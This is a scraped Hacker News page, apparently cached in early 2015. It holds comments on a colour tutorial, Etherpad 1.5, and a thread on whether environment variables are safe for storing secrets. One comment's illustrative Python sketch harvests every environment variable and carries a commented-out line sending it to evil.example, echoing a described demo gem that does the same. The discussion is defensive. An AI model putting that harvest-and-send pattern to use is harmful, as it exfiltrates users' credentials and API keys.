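def colour_distance(c1, c2):
    # plain Euclidean distance in RGB space
    return sum((a - b) ** 2 for a, b in zip(c1, c2)) ** 0.5

def drop_background(popular_colours, image_rows, threshold=30):
    corner = image_rows[0][0]  # upper-left pixel, assumed to be background
    return [c for c in popular_colours if colour_distance(c, corner) > threshold]

# tiny 2x2 "photo" of a dark object on a near-white background
image = [[(250, 250, 250), (248, 249, 250)],
         [(10, 20, 30),    (12, 22, 33)]]
palette = [(249, 250, 250), (11, 21, 31)]
assert drop_background(palette, image) == [(11, 21, 31)]
```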

NIL8 7 hours ago 0 replies      
The page you linked to is very pleasant to view. The colors, spacing, and layout are remarkable. Your tutorial is great, too.
inovica 6 hours ago 0 replies      
That was a good read. We are currently working on a tool to match product images and its hard (but fun) to do. I'd like to know if anyone has created anything like this already in Python and if so if you'd be prepared to have a chat with us?
Etherpad 1.5 Released Features full pad export, import
50 points by Johnyma22  10 hours ago   15 comments top 5
sheetjs 3 hours ago 1 reply      
> Full Etherpad Pad Export and Import

Is there a way on the beta site to start from a file? For example, with ethercalc, you can drop an XLSX or CSV file and it creates an instance from that document ( https://ethercalc.org/ )

gavreh 3 hours ago 1 reply      
Any word when https://etherpad.mozilla.org will be updated?
cultavix 4 hours ago 1 reply      
I just started typing some stuff, testing everything out and then it kicked me out. Perhaps it's because I was using foul language?
brunoqc 3 hours ago 2 replies      
Is there a free hosted version?
math0ne 4 hours ago 1 reply      
Looks cool, but the demo is down...
Surprise Journal: Notice the unexpected
9 points by keerthiko  4 hours ago   discuss
Environment Variables Considered Harmful for Your Secrets
172 points by pwim  14 hours ago   96 comments top 29
CraigJPerry 13 hours ago 3 replies      
This article is misguided. Environment variables can be more secure than files. Furthermore, in the presented case there's no improvement in security by switching to a file.

To address my second claim first: file permissions work at the user or group level. ACLs / MAC likewise. SELinux can be configured to assist in this case but it's not as trivial as it appears at first glance, it would be easier to use environment variables.

In the example case of spawning ImageMagick, it's running as the same user and therefore has the same level of access to the properties file. That is, it can access the secrets without negotiating any authorisation to do so.

Depending on how ImageMagick is launched and how the parent process handles the config file, it's possible that ImageMagick could inherit an already-open handle to the file.

Now to address my first claim: if the parent process is following best practice then it will sanitise the environment before exec'ing ImageMagick, which should mean launching the ImageMagick process with only the environment it needs.

To give a concrete example, the postfix mail transfer agent is extraordinarily high quality software; its spawn process owns the responsibility of launching external processes, potentially sysadmin-supplied / external to postfix. This case would be very comparable to the web app invoking ImageMagick.

We can see that it explicitly handles this case as I've suggested is best practice: https://github.com/vdukhovni/postfix/blob/master/postfix/src...

EDIT: accidentally posted before finishing.

If the parent sanitised the child's environment, then the only way for the child to access the data would be to read the parent's memory. In practice this is quite easy - try the "ps auxe" command for a sample - however this access can much more easily be controlled by SELinux policy than file access can.

Any obfuscation technique applicable to a config file can similarly be applied to an environment variable.
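
The sanitise-before-exec practice described above might look like this in Python (the secret variable names are illustrative):

```python
import os
import subprocess
import sys

SECRET_VARS = {"DB_PASSWORD", "AWS_SECRET_ACCESS_KEY"}  # illustrative names

def spawn_sanitized(argv):
    """Run a child process with all known secrets stripped from its environment."""
    clean = {k: v for k, v in os.environ.items() if k not in SECRET_VARS}
    return subprocess.run(argv, env=clean, capture_output=True, text=True)

os.environ["DB_PASSWORD"] = "hunter2"
child = spawn_sanitized([sys.executable, "-c",
                         "import os; print(os.environ.get('DB_PASSWORD', 'ABSENT'))"])
assert child.stdout.strip() == "ABSENT"  # the secret never reached the child
```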

phunge 5 hours ago 3 replies      
There's a not-widely-publicized feature of Linux that allows programs to store secrets directly in the kernel: https://www.kernel.org/doc/Documentation/security/keys.txt That has some advantages, including the guarantee that it can't be swapped to disk. Kerberos can use it for secret storage, I haven't seen it used elsewhere though.

It looks like process-private storage is one of its features.

ntucker 12 hours ago 3 replies      
My company has an internal bit of infrastructure that I think is a somewhat novel approach that allows us to never have any secrets stored unencrypted on disk. There's a server (a set of servers, actually, for redundancy) called the secret server, and its only job is to run a daemon that owns all the secrets. When an app on another server is started up, it must be done from a shell (we use cap) which has an SSH agent forwarded to it. In order for the app to get its database passwords and various other secrets, it makes a request to the secret server (over a TLS-encrypted socket), which checks your SSH identity against an ACL (different identities can have access to different secrets) and does a signing challenge to verify the identity, and if all passes muster, it hands the secrets back. The app process keeps the secrets in memory and your cap shell disconnects, leaving the app unable to fetch any more secrets on your behalf.

The other kink is that the secret server itself reads the secrets from a symmetrically-encrypted file and when it boots, it doesn't actually know how to decrypt it. There's a master key for this that's stored GPG encrypted so that a small number of people can retrieve it and use a client tool that sends the secret server an "unlock" command containing the master key. So any time a secret server reboots, someone with access needs to gpg --decrypt mastersecret | secret_server_unlock_command someserver

There are some obvious drawbacks to this whole system (constraining pushes to require an SSH agent connection is a biggie and wouldn't fly some places, and agent forwarding is not without its security implications) and some obvious problems it doesn't solve (secrets are obviously still in RAM), but on the whole it works very well for distributing secrets to a large number of apps, and we have written tools that have basically completely eliminated any individual's need to ever actually lay eyes on a secret (e.g. if you want to run any tool in the mysql family, there's a tool that fetches the secret for you and spawns the tool you want with MYSQL_PWD temporarily set in the env, so you need not copy/paste it or be tempted to stick it in a .my.cnf).

bodyfour 13 hours ago 2 replies      
Classic UNIX behavior was that environment variables were public (any user could see them with the right flags to "ps") so it was well-known not to put anything secret there.

Most (all?) of the current brand of UNIX variants have locked this down quite a while ago, which is a good thing. There are still a few old boxes kicking around though so if you're writing code that is meant to be widely deployed please don't put stuff there. For example: https://github.com/keithw/mosh/issues/156

Even if you are sure that your code will only be running on modern machines, I think this article gives good advice. Unless you purge the secret environment variables before you launch subprocesses, they'll get sent to all of them, and it's quite possible that one of them won't consider its environment secret.
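
The inheritance being warned about is easy to demonstrate - by default a child process sees everything in the parent's environment (the variable name here is illustrative):

```python
import os
import subprocess
import sys

os.environ["API_KEY"] = "s3cret"  # illustrative secret set by the parent

# Without an explicit env= argument, the entire parent environment is
# inherited by every subprocess:
child = subprocess.run(
    [sys.executable, "-c", "import os; print(os.environ.get('API_KEY'))"],
    capture_output=True, text=True)
assert child.stdout.strip() == "s3cret"  # the child sees the secret
```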

kgilpin 8 hours ago 2 replies      
Installing secrets on disk exposes them to potential leakage through backups. This is a major issue, since much less attention is typically paid to access management for backups than to production servers. Therefore I support the approach of providing secrets through the environment.

Once an application has been written to get its secrets from the environment, there is a question of how the secrets are obtained. They can be sourced from a file in an init script, but today we are seeing a lot of momentum towards containerized architecture, and the use of service discovery and configuration systems like etcd, zookeeper and consul.

However, secrets require much more attention to security concerns than the data that these tools are designed to handle. Least privilege, separation of duties, encryption, and comprehensive audit are all necessary when dealing with secrets material. To this end, we have written a dedicated product which provides management and access for secrets and other infrastructure resources (e.g. SSH, LDAP, HTTP web services). The deployment model is similar to the HA systems provided by etcd, consul, SaltStack, etc. It's called Conjur (conjur.net).

SwellJoe 13 hours ago 2 replies      
I've always been uncomfortable with the "store config in the environment" part of the 12 factor app thing, since it does imply storing things like database passwords and such, and the argument is that those shouldn't be in files. But, filesystem permissions are reasonably flexible and are easy to reason about (unlike the potential visibility of ENV).

I also don't really buy the arguments for ENV storage of even non-sensitive data. There's just not really any good reason to do so; your config has to be put in place by some tool, even if it is in ENV; why not make your tool produce a file, with reasonable permissions in a well-defined default location? The 12 Factor App article seems to believe that config files live in your source tree, and are thus easily accidentally checked into revision control. That's not where my config files live. My config files live in /etc; or, if I want it to isolate a service to a user, I make a /home/user/etc directory.

One could say, "Don't store passwords in the revision control system alongside your source." And that would be reasonable. But, there's no reason to throw the baby out with the bath water.
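
A minimal sketch of the config-file-with-permissions approach, assuming a POSIX system; a temp directory stands in for /etc here, and the file is created owner-only from the start so there is no window with loose permissions:

```python
import json
import os
import stat
import tempfile

# Illustrative: in production this would live under /etc/myapp/ (or
# /home/user/etc) and be owned by the service user.
conf_dir = tempfile.mkdtemp()
conf_path = os.path.join(conf_dir, "myapp.conf")

fd = os.open(conf_path, os.O_WRONLY | os.O_CREAT, 0o600)  # owner-only at creation
with os.fdopen(fd, "w") as f:
    json.dump({"db_password": "hunter2"}, f)

mode = stat.S_IMODE(os.stat(conf_path).st_mode)
assert mode == 0o600  # readable and writable by the owner alone
```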

ealexhudson 13 hours ago 2 replies      
Fundamentally, any secrets you store will have some mode of access - there's a downside to each and every way of distributing them.

If you're shelling out to commands you think might snarf credentials, the environment is easy for them to pick it out of, but if they're running as the same user then they could probably read the secrets from the config file. If they aren't running as the same user, you need a way of passing in the secrets - and we tend to come back to environment variables.

The good practice here is just to reset the environment when calling shell commands, as he notes. It's not hard to do.

fubarred 13 hours ago 0 replies      
Ultimately, secrets need to live somewhere and need to be accessed as plain text. Just make sure the access window is as small as possible, and try to obliterate the secret after use, if possible.

If one absolutely needs to centralize secrets (TLS/SSL private keys, entropy sources, etc.) (at risk of SPOF or some HA setup), use some PSK style setup that delivers them directly, out-of-band (via separate NICs) or prioritized ahead of regular traffic. Keep it simple. Otherwise, prefer something like zookeeper with encrypted secrets (again PSK keying per box). Try to not deploy the same secret on every box, if possible. Also, try to avoid magic secrets if you can too (remove all local password hashes, use only auth keys).

If you're uncomfortable with plaintext secrets, encrypt them (as end-to-end as possible) and require an out-of-band decryption key at the last possible moment.

It's like having a secure document viewing system... ultimately, someone will need to browse just enough of the plaintext version, or it's not a document viewing system.

louwrentius 8 hours ago 0 replies      
Please don't use environment variables to store secrets. There are too many angles - as stated by others - where this data may leak into files or processes.

I would propose using just one folder like /secret and putting your config files in there. Exclude this folder from backup on all relevant hosts.

Then spend your time on security of your hosts, applications (OWASP) and monitoring / alerting. Something that you have to do anyway.

RubyPinch 10 hours ago 1 reply      
Assuming you aren't trying to go for top security, and just want a way to keep things safe from leaking due to errors and such,

why not just make use of the OS's secrets store? for example, like how https://pypi.python.org/pypi/keyring operates

jmnicolas 9 hours ago 1 reply      
You could still store your secret keys in ENV but encrypt them. Only your program has the means to decrypt them, so in the case of an ImageMagick subprocess, it would see only your encrypted secret key with no way to decrypt it.

Same thing while debugging: only the encrypted key is printed.

tezza 12 hours ago 1 reply      
Isn't this what TPM was designed to avoid ?

Neither files nor env variables.

Most chipsets have a rather unused TPM function, and it should be possible to have developers and processes hook into that.

Perhaps using tpmtool? On master process startup, ask the user for a passphrase, and use that to query the TPM-stored values?


flavor8 10 hours ago 2 replies      
I typically store the env _name_ in the environment, and then use that in my apps to build a path to the file containing secrets (e.g. /etc/{mycompany}/{environment}/myapp.conf). The file is locked down by ACLs or permissions.
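
As a sketch of this scheme, only the environment *name* travels through the environment, while the secrets live in a permission-locked file whose path is derived from it (all names and paths here are illustrative):

```python
import os

os.environ["APP_ENV"] = "staging"  # the only thing stored in the environment

# Build the path to the locked-down config file that holds the real secrets.
conf_path = "/etc/mycompany/{}/myapp.conf".format(os.environ["APP_ENV"])
assert conf_path == "/etc/mycompany/staging/myapp.conf"
```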
dagi3d 13 hours ago 0 replies      
We are in a similar situation and there is another approach I'd like to research. In order to have distributed properties I was considering using something like consul [1] or etcd [2], which have some access control, and loading the required variables from upstart scripts.

[1] https://www.consul.io/

[2] https://github.com/coreos/etcd

sritrisna 12 hours ago 1 reply      
Ansible has a neat feature, called Ansible Vault, which lets you encrypt sensitive files. This in combination with dotenv-deployment works pretty well for our Rails apps. The only thing I'm worried about is someone gaining unauthorised access to our servers and thus being able to read all the credentials stored inside the .env file, especially the username & password to our externally hosted db. Probably the only way to prevent this would be to properly secure your server and the use of an IDS? Does anyone have any experience with someone hacking their servers and successfully preventing e.g. a db dump? In this particular case, how easy would it be to stop attackers in their tracks?
sujeetsr 7 hours ago 1 reply      
Ok, I'm confused by 'environment variable' vs files. How does one set an environment variable without putting it in a file on the particular server? Or by 'file' in this article (and the 12-factor one) do they mean a file that is in source control?
moe 8 hours ago 1 reply      
1. It's easy to grab the whole environment and print it out (can be useful for debugging) or send it as part of an error report for instance.

If you have software in your deployment that will send "error reports" to untrusted third parties then you have bigger problems than your shell environment.

2. The whole environment is passed down to child processes

If you don't trust your child processes then you have bigger problems than your shell environment.

3. External developers are not necessarily aware that your environment contains secret keys.


I'm not sure what you mean by "external developer" and what you expect them to do with your environment. E-Mail it out when an error occurs?

If you tolerate that kind of developer on your project then you.. oh well, see above.

grhmc 9 hours ago 0 replies      
Clearing your environment variables after reading them, and only passing the ENVs required to perform the new task, are pretty basic security measures. This was pretty common practice in the '90s, and I was hoping that it would be one of the lessons out of Shellshock.
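
The read-then-clear measure amounts to one line in Python (the variable name is illustrative):

```python
import os

os.environ["API_KEY"] = "s3cret"          # illustrative: set by the init system
secret = os.environ.pop("API_KEY", None)  # read once, then scrub

assert secret == "s3cret"
assert "API_KEY" not in os.environ  # later subprocesses can no longer inherit it
```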
gopalv 13 hours ago 0 replies      
I got bitten by env vars a few years back, though due to performance issues in getenv(), and ended up writing a whole bunch of PHP magic to ship config files safely and fast.

With pecl/hidef, I can hook a bunch of text .ini files into the PHP engine and define constants as each request comes in.

Originally, it was written for a nearly static website, which was spending a ridiculous amount of time defining constants, which rolled over every 30 minutes.

Plus those .ini files were only readable by root, which read them and then forked off the unprivileged processes.

But with the hidef.per_request_ini, I could hook that into the Apache2 vhost settings, so that the exact same code would operate with different constants across vhosts without changing any code between them.

Used two different RPMs to push those two bits so that I could push code & critical config changes as a two-step process.

And with a bit of yum trickery (the yum-multiverse plugin), I could install two versions of code and one version of config, and other madness like that with the help of update-alternatives.

That served as an awesome A/B testing setup, to inoculate a new release with a fraction of users hitting a different vhost for the micro-service.

I'm rambling now, but the whole point is that you need per-request/per-user config overlay layers, for which env vars are horrible, slow and liable to be printed every time someone throws some diagnostics up.

jph 12 hours ago 1 reply      
We've had good success with distributing our secrets using a GPG-encrypted file that we put in /etc, not in the source code tree. We then use an ENV setting to point the app to the file. This gives us good flexibility (because one server can have multiple GPG files if we want, such as alpha/beta/gamma) and good encryption.
zamalek 13 hours ago 0 replies      
We had to migrate our software from single-tenant (per machine) to multi-tenant for our cloud offering, on an 11-year-old code base.

We used Michael's trick: environment variables pointing to config files work unbelievably well if you ever need to implement a multi-tenant cloud offering.

So apart from the security aspect, there's the fact that it is a more versatile design.

iopq 4 hours ago 1 reply      
How do you suppose I do this in AWS, where I have several load-balanced, auto-scaled servers? It kind of forces you to put it in environment variables.
greenleafjacob 12 hours ago 1 reply      
I wrote a library to handle mixed configuration values by using asymmetric RSA encryption [1].

[1]: https://github.com/jacobgreenleaf/greybox

astletron 10 hours ago 0 replies      
Please consider the environment before printing this config?
fartclops 6 hours ago 1 reply      
While I could simply tell you to blank out ENV vars once you've internalized them, I will instead write an infinitely long essay on how they are "considered harmful" that contributes absolutely nothing back to society.
klalle 13 hours ago 3 replies      
While I agree that storing API keys in the code repository is not the best idea, I am curious about the suggestion of moving them into Chef configs.

Wouldn't that, in turn, also be stored in a code repository, likely accessible in the same way as the main code repo? If so, this feels like a non-solution to me.

logicallee 10 hours ago 0 replies      
Why not just split it up with an OTP: store one half in the code (or a file) and the other half in the environment variable, then combine them in code (or include the file). Seems like that would work. (You need both parts.)
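
The split-key idea above can be sketched with a simple XOR one-time pad (function names invented for illustration): either share alone is indistinguishable from random bytes, so leaking just the env var half reveals nothing.

```python
import secrets as secrets_mod  # stdlib CSPRNG, not the app's secrets

def split_key(key: bytes):
    """Split a key into two shares; both are needed to reconstruct it."""
    pad = secrets_mod.token_bytes(len(key))        # random one-time pad
    share = bytes(a ^ b for a, b in zip(key, pad))  # key XOR pad
    return pad, share  # e.g. one goes in a file, the other in the env

def combine(pad: bytes, share: bytes) -> bytes:
    """XOR the two shares back together to recover the original key."""
    return bytes(a ^ b for a, b in zip(pad, share))
```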

I think this article is a response to people's practice of keeping API keys in environment variables so as to keep them off of the filesystem (or at least out of what git sees and checks in) so that they don't accidentally publish them, as happened in that article where some gem he was using to respect .gitignore didn't work for some reason.

Would this work as a solution?

tibbon 6 hours ago 0 replies      
I created a quick gem (which you shouldn't install) that demonstrates having some untrusted code in your app which will post all of your environment variables to a 3rd party server: https://github.com/tibbon/env_danger

Now, of course no one would install and run this... but I could imagine someone accidentally typing the name of a gem wrong, someone accepting a bad PR (perhaps even via a sub-dependency?), etc., and somehow something untrusted getting in there. Yes, that means you have other problems, but it isn't outside the realm of possibility that accidental access like this happens.

Just because it shouldn't happen, doesn't mean it will never happen.
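
To make the risk concrete, here is a deliberately inert Python sketch of what any transitively-installed dependency could do (the gem above is the Ruby equivalent); the actual network call is left as a comment:

```python
import json
import os

def harvest_environment() -> str:
    """Collect every environment variable into a JSON payload.

    Any code your process imports can do this. Nothing in the language
    stops a dependency from then shipping the payload off, e.g.:
    # urllib.request.urlopen("https://evil.example/collect",
    #                        data=payload.encode())
    """
    return json.dumps(dict(os.environ))
```

Secrets kept in files with restrictive permissions at least force an attacker to know (or discover) the paths; `os.environ` hands everything over in one call.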

       cached 2 January 2015 23:02:01 GMT